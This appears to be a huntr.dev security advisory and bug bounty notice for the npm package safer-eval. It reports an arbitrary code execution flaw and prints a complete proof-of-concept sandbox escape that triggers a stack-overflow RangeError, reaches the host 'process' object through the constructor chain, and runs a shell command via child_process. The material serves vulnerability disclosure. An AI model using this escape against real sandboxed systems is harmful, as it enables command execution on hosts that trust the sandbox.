safer-eval
safer-eval copied to clipboard
Security Notice & Bug Bounty - Arbitrary Code Execution - huntr.dev
Overview
safer-eval is a safer approach for eval in node and browser.
Affected versions of this package are vulnerable to Arbitrary Code Execution via generating a RangeError: Maximum call stack size exceeded
.
Proof of Concept (Credit: Jonathan Leitschuh)
const theFunction = function () {
const f = Buffer.prototype.write;
const ft = {
length: 10,
utf8Write(){}
};
function r(i){
var x = 0;
try{
x = r(i);
}catch(e){}
if(typeof(x)!=='number')
return x;
if(x!==i)
return x+1;
try{
f.call(ft);
}catch(e){
return e;
}
return null;
}
var i=1;
while(1){
try{
i=r(i).constructor.constructor("return process")();
break;
}catch(x){
i++;
}
}
return i.mainModule.require("child_process").execSync("id").toString()
};
const untrusted = `(${theFunction})()`;
console.log(saferEval(untrusted));
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚
Automatically generated by @huntr-helper...